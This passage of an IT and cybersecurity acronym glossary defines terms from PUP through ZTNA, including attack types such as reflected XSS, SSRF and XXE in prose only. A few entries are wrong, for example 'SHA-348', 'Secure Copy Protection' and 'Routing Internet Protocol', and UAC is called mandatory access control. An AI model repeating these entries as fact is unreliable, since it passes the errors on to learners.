One of the two protocols that receive e-mail from SMTP servers.
Potentially Unwanted Program (PUP)
A software program you likely didn’t want installed on your computer. PUPs are common in bundled systems.
Power Distribution Unit (PDU)
A rack-mounted set of outlets for devices installed in the rack. Connected to the rack’s uninterruptible power supply (UPS).
Pre-Shared Key (PSK)
A shared secret which was previously shared between two parties using some secure channel before it needs to be used.
Pretty Good Privacy (PGP)
A popular encryption program that has the ability to encrypt and digitally sign e-mail and files.
Privacy Enhanced Mail (PEM)
Internet standard that provides for secure exchange of e-mail using cryptographic functions.
Private Branch Exchange (PBX)
A telephone exchange that serves a specific business or entity.
Privileged Access Management (PAM [1])
A cybersecurity strategy to control, monitor, secure and audit all identities across an IT environment.
Protected Extensible Authentication Protocol (PEAP)
A protected version of EAP developed by Cisco, Microsoft, and RSA Security, that functions by encapsulating the EAP frames in a TLS tunnel.
Proxy Auto Configuration (PAC)
A method of automating the connection of web browsers to appropriate proxy services to retrieve a specific URL.
Public Key Cryptography Standards (PKCS)
A series of standards covering aspects of the implementation of public key cryptography.
Public Key Infrastructure (PKI)
Infrastructure for binding a public key to a known user through a trusted intermediary, typically a certificate authority.
RACE Integrity Primitives Evaluation Message Digest (RIPEMD)
An open-source hashing algorithm that creates a unique 160-bit, 256-bit, or 320-bit message digest for each file.
Radio Frequency Identification (RFID)
A technology used for remote identification via radio waves.
Rapid Application Development (RAD)
A software development methodology that favours the use of rapid prototypes and changes as opposed to extensive advanced planning.
Rapid Security Response (RSR)
A feature from Apple, that delivers important security improvements to devices running iOS, iPadOS and macOS, between the regular software updates.
Real-time Operating System (RTOS)
An operating system designed to work in a real-time environment.
Real-time Transport Protocol (RTP)
A protocol for a standardised packet format used to carry audio and video traffic over IP networks.
Recovery Point Objective (RPO)
The amount of data a business is willing to place at risk. It is determined by the amount of time a business has to restore a process before an unacceptable amount of data loss results from a disruption.
Recovery Time Objective (RTO)
The amount of time a business has to restore a process before unacceptable outcomes result from a disruption.
Redundant Array of Independent or Inexpensive Disks (RAID)
A method for creating a fault tolerant storage system. RAID uses multiple hard drives in various configurations to offer different levels of speed and data redundancy.
Reflected Cross-site Scripting (RXSS)
A vulnerability that arises when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Registration Agent (RA [1])
Part of the PKI system responsible for establishing registration parameters during the creation of a certificate.
Remote Access Server (RAS)
A combination of hardware and software used to enable remote access to a network.
Remote Access Trojan (RAT)
A set of malware designed to exploit a system providing remote access.
Remote Authentication Dial-in User Service (RADIUS)
A standard protocol for providing authentication services that is commonly used in dial-up, wireless, and PPP environments.
Remote Code Execution (RCE)
A type of attack that allows an attacker to remotely execute malicious code on a computer resulting in, for example, malware execution or gaining full control over the compromised machine.
Remote Desktop Protocol (RDP)
Protocol used for Microsoft's Remote Desktop tool.
Remote File Inclusion (RFI [2])
A type of vulnerability that allows an attacker to include a file, usually exploiting a dynamic file inclusion mechanism implemented in the target application. This vulnerability exists where there isn’t appropriate user input validation.
Remotely Triggered Black Hole (RTBH)
A popular and effective filtering technique for the mitigation of denial-of-service attacks.
Research and Development in Advanced Communications Technologies in Europe (RACE)
A program launched in the 1980s by the Commission of European Communities to pave the way towards commercial use of Integrated Broadband Communication (IBC) in Europe in the late 1990s.
Return on Investment (ROI)
A measure of the effectiveness of the use of capital.
Rivest Cipher version 4 (RC4)
A streaming symmetric-key algorithm. No longer secure due to the many vulnerabilities that have been discovered since its initial implementation.
Rivest, Shamir, & Adleman (RSA)
The names of the three men who developed a public key cryptographic system and the company they founded to commercialise the system.
Role-based Access Control (RBAC [1])
Roles within an organisation are assigned access permissions necessary to carry out those roles. These are in turn assigned to specific users that fulfil the roles within the organisation.
Router Advertisements (RA [2])
On multicast-capable links and point-to-point links, each router periodically sends to the multicast group a router advertisement packet that announces its availability. A host receives router advertisements from all routers, building a list of default routers. Routers generate router advertisements frequently enough so that hosts learn of their presence within a few minutes. However, routers do not advertise frequently enough to rely on an absence of advertisements to detect router failure. A separate detection algorithm that determines neighbour unreachability provides failure detection.
Routing Internet Protocol (RIP)
A routing protocol. Version 1 had several shortcomings, with a maximum hop count of 15 and a routing table update interval of 30 seconds, causing every router on a network to send out its table at once. Version 2 added support for CIDR and fixed some of the issues with version 1, but maximum hop count remained.
Rule-based Access Control (RBAC [2])
A series of rules are contained within an access control list to determine whether access should be granted or not, for example, don’t allow access to certain files outside of working hours during the week or on weekends.
Secure Access Service Edge (SASE)
A cloud-based security framework that provides secure access to network resources from anywhere.
Secure Copy Protection (SCP)
A means of securely transferring computer files between a local host, a remote host, or between two remote hosts.
Secure File Transfer Protocol (SFTP [1])
Uses SSH to provide the encryption for secure file transfer.
Secure Hashing Algorithm (SHA)
A hashing algorithm used to hash block data. The first version is SHA-1, with subsequent versions detailing the hash digest length: SHA-256, SHA-348, and SHA-512.
Secure Hypertext Transfer Protocol (SHTTP)
An alternative to HTTPS in which only the transmitted pages and POST fields are encrypted. Not widely used following the widespread adoption of HTTPS.
Secure Real-time Protocol (SRTP)
A secure version of the standard protocol for a standardised packet format used to carry audio and video traffic over IP networks.
Secure Shell (SSH)
An encrypted remote terminal connection program, used to remotely connect to a server. SSH uses asymmetric encryption, however, it generally requires an independent source of trust with a server, such as manually receiving a server key, to operate.
Secure Sockets Layer (SSL)
A protocol developed for transmitting private documents over the internet. It works by using a public key to encrypt sensitive data. This encrypted data is then sent over an SSL connection and then decrypted at the receiving end using a private key. Deprecated by Transport Layer Security (TLS).
Secure Web Gateway (SWG)
An on-premise or cloud-delivered network security service. Sitting between users and the Internet, secure web gateways provide advanced network protection by inspecting web requests against company policy to ensure malicious applications and websites are blocked and inaccessible.
Secure/Multipurpose Internet Mail Extensions (S/MIME)
An encrypted implementation of the MIME protocol specification.
Security Assertions Markup Language (SAML)
An XML-based standard for exchanging authentication and authorisation data.
Security Content Automation Protocol (SCAP)
A method of using specific protocols and data exchanges to automate the determination of vulnerability management, measurement, and policy compliance across a system or set of systems.
Security Information and Event Management (SIEM)
A two-part process consisting of security event management (SEM), which performs real-time monitoring of security events and security information management (SIM), where the monitoring log files are reviewed and analysed by automated and human interpreters.
Security Operations Centre (SOC [1])
The grouping of security operations in an enterprise.
Security Orchestration, Automation, Response (SOAR)
A system designed to facilitate responses in incident response situations.
Security-enhanced Linux (SE Linux)
A security enhancement to Linux that allows users and administrators more control over access control. Standard Linux access controls allow a user, and the applications the user runs, to specify who has read, write, and execute permissions on a file, whereas SE Linux access controls are determined by a policy loaded on the system, which cannot be changed by careless users or misbehaving applications.
Security, Trust, Assurance, Risk (STAR)
A globally recognized cloud security assurance program developed by the Cloud Security Alliance (CSA). It promotes transparency, rigorous auditing, and harmonisation of security standards to help cloud service providers (CSPs) validate and communicate their security posture. The program is built on the Cloud Controls Matrix (CCM), a comprehensive framework of 197 control objectives across 17 domains, which assesses cloud-specific security, privacy, and compliance controls.
Self-Encrypting Drives (SED)
A data drive that has built-in encryption capability on the drive control itself.
Sender Policy Framework (SPF)
An e-mail validation system designed to detect e-mail spoofing by verifying that incoming mail comes from a host authorised by that domain’s administrator.
Server-side Request Forgery (SSRF)
A type of computer security exploit where an attacker abuses the functionality of a server causing it to access or manipulate information in the realm of that server that would otherwise not be directly accessible to the attacker.
Service Level Agreement (SLA)
A document between a customer and service provider that defines the scope, quality, and terms of the service to be provided.
Service Level Objective (SLO)
An agreed upon target within a Service Level Agreement (SLA) that must be achieved for each activity, function, and process to provide the best opportunity for customer success.
Service Record (SRV)
DNS record that associates servers for individual protocols with a domain. SRV records specify a host, port, protocol, and other details for a specific service. For example, VoIP clients can readily discover a domain’s associated SIP server.
Short Message Service (SMS)
A form of text messaging over phone and mobile phone circuits that allows up to 160-character messages to be carried over signalling channels.
Simple Certification Enrolment Protocol (SCEP)
A protocol used in PKI for enrolment and other services.
Simple Mail Transfer Protocol (SMTP)
The main protocol used to send email over the internet.
Simple Mail Transfer Protocol Secure (SMTPS)
The secure version of the standard Internet protocol used to transfer e-mail between hosts.
Simple Network Management Protocol (SNMP)
A set of standards for communication with network devices, such as switches and routers, connected to a TCP/IP network. Used for network management.
Simple Object Access Protocol (SOAP)
An XML-based specification for exchanging information associated with web services.
Simultaneous Authentication of Equals (SAE)
A secure key negotiation and exchange method for password-based authentication methods. It is a variant of the Dragonfly key exchange protocol specified in RFC 7664, which in turn is based on the Diffie-Hellmann key exchange. It is used with Wi-Fi Protected Access 3 (WPA3), IEEE 802.11 WLAN mesh networks, amongst other things.
Single Loss Expectancy (SLE)
Monetary loss or impact of each occurrence of a threat. SLE = asset value x exposure factor.
Single Sign-On (SSO)
An authentication process by which the user can enter a single user ID and password and then move from application to application or resource to resource without having to supply further authentication information.
SMShing
An attempt to gain sensitive information, such as user account and bank details, for malicious reasons, via an SMS message, purporting to be from a trustworthy source. This might be to steal someone’s identity, for financial gain, or both.
Social Engineering
The use of deception to manipulate an individual into divulging confidential or personal information that may be used for fraudulent purposes.
Software as a Service (SaaS)
Cloud service model that provides centralised applications accessed over a network.
Software Development Kit (SDK)
A collection of software development tools that facilitate the creation of software, which can include a software framework, compiler and debugger.
Software Development Life Cycle (SDLC)
A process used by the software industry to design, develop and test high quality software. The Software Development Life Cycle typically consists of stages such as, planning and requirements analysis, definition of requirements, design, build, test, deploy and maintain. There are a number of different Software Development Life Cycle models that are used today, including the waterfall model, the iterative model, the spriral model, the V-medel and the big bang model.
Software Development Life-cycle Methodology (SDLM)
The processes and procedures employed to develop software. Sometimes also called secure development lifecycle model when security is part of the development process.
Software-Defined Network (SDN)
Programming that allows a master controller to determine how network components will move traffic through the network. Used in virtualisation.
Software-defined Visibility (SDV)
A framework that enables visibility into network operations and functions.
Software-Defined WAN (SDWAN)
A wide area network that uses software-defined network technology, such as communicating over the Internet using overlay tunnels which are encrypted when destined for internal organisation locations.
Software-defined Wide Area Network (SD-WAN)
A virtual wide area network architecture that allows enterprises to connect users securely and efficiently to applications. Software is used to control the connectivity, management and services between data centres, remote offices, and cloud resources.
Solid State Disk/Drive (SSD)
A mass storage device, such as a hard drive, that is composed of electronic memory as opposed to a physical device made up of spinning platters.
Spam over Instant Messaging (SPIM)
Spam sent over an instant messaging channel.
Spoofing
Spoofing is a fraudulent or malicious activity whereby a communication is sent from an unknown source disguised as a source that is known to the receiver. E-mail spoofing is a particular type of spoofing where the header of an e-mail is forged to appear as though it from a particular sender, but instead is from an unknown source.
SSH File Transfer Protocol (SFTP [2])
A secure file transfer subsystem associated with Secure Shell (SSH).
Start of Authority (SOA)
DNS record that defines the primary name server in charge of a domain. Also includes parameters that control how secondary name servers check for updates to the zone file, such as the serial number which indicates whether the zone file has updates to fetch.
Statement of Work (SOW)
A document used in project management, that provides a narrative description of the work requirements for a project. It includes a definition of project activities, deliverables and timelines for an organisation providing services to a client.
Storage Area Network (SAN [1])
A server that can take a pool of hard disks and present them over the network as any number of logical disks.
Structured Exception Hander (SEH)
The process used to handle exceptions in the Windows operating system core functions.
Structured Query Language (SQL)
A language created by IBM that relies on simple English statements to perform database queries. SQL enables databases from different manufacturers to be queried using a standard syntax.
Structured Query Language Injection (SQLi)
An attack against an interface using SQL.
Structured Threat Information eXpression (STIX)
A framework for passing threat information across automated interfaces.
Subject Alternative Name (SAN [2])
A field in a certificate that has several uses, for example, for a machine, it can represent its Fully Qualified Domain Name (FQDN), for a user, it can be the User Principal Name (UPN), and for an SSL certificate, it can indicate multiple domains for which the certificate is valid.
Subscriber Identity Module (SIM)
An integrated circuit or hardware element that securely stores the International Mobile Subscriber Identity (IMSI) and the related key used to identify and authenticate subscribers on mobile telephones.
Supervisory Control and Data Acquisition (SCADA)
A system that has the basic components of a distributed control system (DCS), yet is designed for large-scale, distributed processes and functions with the idea that remote devices may or may not have ongoing communication with the central control.
Switch
An electronic device that provides a common point for the connection of network devices, which replaced Hubs. A switch will learn the MAC address of all connected devices when they first connect. This means that it can forward data to the correct device, rather than to all connected devices, as with a Hub.
System and Organisation Controls 2 (SOC2)
A cyber security and data protection framework developed by the American Institute of Certified Public Accountants (AICPA), that is designed to evaluate and validate a service organisation's information security practices, particularly those related to protecting customer data.
System Log (SYSLOG)
System log collector in macOS and Linux. Useful for auditing, performance monitoring, and troubleshooting.
System on Chip (SoC [2])
The integration of complete system functions on a single chip in order to simplify construction of devices.
Tactics, Techniques, and Procedures (TTP)
The methods used by an adversary, organised in a fashion to assist in identification and defence.
Telecommunications Industry Association/Electronic Industries Alliance (TIA/EIA)
The standards body that defines most of the standards for computer network cabling. Many of these standards are defined under the ANSI/TIA-568 standard. Since the Electronics Industry Association (EIA) was accredited by the American National Standards Institute (ANSI) to develop the standards, the name changed from TIA/EIA to ANSI/TIA after the EIA closed in 2011.
Temporal Key Integrity Protocol (TKIP)
A deprecated encryption standard used in WPA that provided a new encryption key for every sent packet.
Terminal Access Controller Access Control System Plus (TACACS+)
A proprietary protocol developed by Cisco to support Authorisation, Authentication, and Accounting (AAA) in a network with many routes and switches. It is like RADIUS in function but uses TCP port 49 by default and separates AAA into different parts.
Text (TXT)
A DNS record in text format, which contains information about a domain, as well as details that help external network servers and services handle outgoing email from a domain. These records can be used to verify domain ownership, ensure email security, and prevent spam or phishing.
Threat Actor
An individual or group who are responsible for an attack or security incident against another individual or organisation.
Ticket Granting Ticket (TGT)
A part of the Kerberos authentication system that is used to prove identity when requesting service tickets.
Time-based One Time Password (TOTP)
A password that is used once and is only valid during a specific time period.
Time-of-check (TOC)
Refers to the time a value of something is checked in a multithreaded application.
Time-of-use (TOU)
Refers to the time a value of something is used in a multithreaded application. The greater the separation between the time a program checks a value, and when it uses the value, the more likely it is for problems such as race conditions to arise.
Transaction Signature (TSIG)
A protocol used as a means of authenticating dynamic DNS records during DNS updates.
Transmission Control Protocol (TCP)
A Layer 4 connection-oriented protocol within the TCP/IP suite. TCP provides a reliable communications channel over an unreliable network by ensuring all packets are accounted for and retransmitted if any are lost.
Transmission Control Protocol/Internet Protocol (TCP/IP)
A set of communication protocols, developed by the U.S. Department of Defence, which enable dissimilar computers to share information over a network.
Transport Layer Security (TLS)
A protocol where hosts use public-key cryptography to securely negotiate a cipher and symmetric key over an unsecured network, and the symmetric key to encrypt the rest of the session. TLS is the current name for the historical SSL protocol.
Triple Data Encryption Standard (3DES)
Three Rounds of DES encryption used to improve security.
Trivial File Transfer Protocol (TFTP)
A protocol that transfers files between servers and clients, without the need for user login. Devices that need an operating system, but have no local hard disk (for example, diskless workstations and routers), often use TFTP to download their operating systems.
Trusted Automated eXchange of Indicator Information (TAXII)
A transport framework for STIX data communication.
Trusted Platform Module (TPM)
A hardware chip to enable trusted computing platform operations.
Unified Endpoint Management (UEM)
The aggregation of multiple products into a single system on an endpoint for efficiency purposes.
Unified Extensible Firmware Interface (UEFI)
A specification that defines the interface between an operating system and the hardware firmware. This is a replacement to BIOS.
Unified Threat Management (UTM)
The aggregation of multiple network security products into a single appliance for efficiency purposes.
Uniform Resource Identifier (URI)
A set of characters used to identify the name of a resource in a computer system. A URL is a form of URI.
Uniform Resource Locator (URL)
An address that defines the type and the location of a resource on the Internet. URLs are used in almost every TCP/IP application.
Uninterruptible Power Supply (UPS)
A source of power, usually a battery, that is designed to provide uninterrupted power to a computer system in the event of a temporary loss of power.
Universal Serial Bus (USB)
A common interface that enables communication between devices and a host controller such as a personal computer (PC) or smartphone. It connects peripheral devices such as digital cameras, mice, keyboards, printers, scanners, media devices, external hard drives, and flash drives. Because of its wide variety of uses, including support for electrical power, the USB has replaced a wide range of interfaces like the parallel and serial port.
Unmanned Aerial Vehicle (UAV)
A remotely piloted flying vehicle.
Unshielded Twisted Pair (UTP)
A popular cabling for telephone and computer networks composed of pairs of wires twisted around each other at specific intervals. The twists serve to reduce interference, or crosstalk, as it is sometimes known. The more twists, the less interference. The cable has no metallic shielding to protect the wires from external interference, unlike Shielded Twisted Pair (STP). UTP is available in a variety of grades, called categories.
USB On-The-Go (USB OTG)
A standardised specification that allows a device to read data from a USB device without requiring a PC.
User Acceptance Testing (UAT)
The application of acceptance-testing criteria to determine fitness for use according to end-user requirements.
User Access Control (UAC)
Mandatory access control enforcement facility introduced with Microsoft Windows Vista and Windows Server 2008, with a more relaxed version in Windows 7, 8, 10, Server 2008 R2 and 2012.
User and Entity Behaviour Analytics (UEBA)
A security process that uses user behaviour patterns to determine anomalies.
User Datagram Protocol (UDP)
Connectionless protocol in the TCP/IP suite. Has less overhead and better performance than TCP, but also a higher risk of errors. Fire-and-forget UDP datagrams do a lot of important behind-the-scenes work in a TCP/IP network.
Variable Length Subnet Masking (VLSM)
The process of using variable-length subnets to create subnets within subnets.
Video Teleconferencing (VTC)
A business process of using video signals to carry audio and visual signals between separate locations, thus allowing participants to meet via a virtual meeting instead of traveling to a physical location.
Virtual Desktop Environment (VDE)
The use of virtualisation technology to host desktop systems on a centralised server.
Virtual Desktop Infrastructure (VDI)
The use of servers to host virtual desktops by moving the processing to the server and using the desktop machine as merely a display terminal.
Virtual Local Area Network (VLAN)
A common feature among managed switches that enables a single switch to support multiple Layer 2 broadcast domains and provide isolation between hosts on different VLANs. Critical for modern network performance and security.
Virtual Machine (VM)
A virtual computer accessed through a class of programs called a hypervisor or virtual machine monitor. A virtual machine runs inside your actual operating system, essentially enabling you to run two or more operating systems at once.
Virtual Private Cloud (VPC)
A cloud instance that is virtually isolated by the provider.
Virtual Private Network (VPN)
A network configuration that enables a remote user to access a private network via the Internet. VPNs employ an encryption methodology called tunnelling, which protects the data from interception.
Vishing
An attempt to gain sensitive information, such as user account and bank details, for malicious reasons, via the telephone, purporting to be from a trustworthy source. This might be to steal someone’s identity, for financial gain, or both.
Visual Basic for Applications (VBA)
A Microsoft specification for using Visual Basic in applications such as the Office Suite.
Voice over Internet Protocol (VoIP)
The use of an IP network to conduct voice calls.
Web Application Firewall (WAF)
A firewall that operates at the application level, specifically designed to protect web applications by examining requests at the application stack level.
Wi-Fi Protected Access (WPA)
A wireless security protocol that addresses weaknesses and acts as an upgrade to WEP. WPA offers security enhancements such as dynamic encryption key generation (keys are issued on a per-user and per-session basis), an encryption key integrity-checking feature, user authentication through the industry standard Extensible Authentication Protocol (EAP), and other advanced features that WEP lacks. WPA has been replaced by the more secure WPA2.
Wi-Fi Protected Setup (WPS)
A network security standard that allows easy setup of a wireless home network.
Wired Equivalent Privacy (WEP)
The encryption scheme used to attempt to provide confidentiality and data integrity on 802.11 networks.
Wireless Access Point (WAP)
Connects wireless network nodes to wireless or wired networks. Many WAPs are combination devices that act as high-speed hubs, switches, bridges, and routers, all rolled in to one.
Wireless Internet Service Provider (WISP)
An internet service provider for which the last segment or two uses a point-to-point long-range fixed wireless connection.
Wireless Intrusion Detection System (WIDS)
An intrusion detection system established to cover a wireless network.
Wireless Intrusion Prevention System (WIPS)
An intrusion prevention system established to cover a wireless network.
Wireless Local Area Network (WLAN)
A network that allows devices to connect and communicate wirelessly.
Wireless Mesh Network (WMN)
A hybrid wireless network topology in which most nodes connect in a mesh network while also including some wired machines. Nodes act like routers by forwarding traffic for other nodes, but without wires.
Wireless TLS (WTLS)
A protocol based on the Transport Layer Security (TLS) protocol, that provides reliability and security for wireless communications using the Wireless Application Protocol (WAP). It is necessary due to the limited memory and processing abilities of some WAP enabled mobile devices.
Wireless Wide Area Network (WWAN)
A form of wireless network over a wide area, which utilises cellular network technologies, such as 4G LTE and 5G to transfer data.
Work Order (WO)
A task or job for a customer, that can be scheduled or assigned to a particular person.
World Wide Web Consortium (W3C)
An international body that maintains web-related rules and frameworks, comprising of over 350 member organisations, which jointly develop web standards, run outreach programs, and maintain an open forum for talking about the Web.
XML External Entity (XXE)
A security vulnerability that allows a threat actor to inject unsafe XML entities into a web application that processes XML data. This can lead to the threat actor being able to interact with systems the application can access, view files on the server, and in some cases, perform remote code execution (RCE).
Zed Attack Proxy (ZAP)
An open-source penetration testing tool for finding vulnerabilities in web applications.
Zero Trust Architecture (ZTA)
A network architecture whereby the trust is removed, with an assumption made that it is a hostile environment where all requests are verified based on an access policy.
Zero Trust Network Access (ZTNA)
A solution that provides secure remote access to an organisation’s applications, data, and services based on clearly defined access control policies.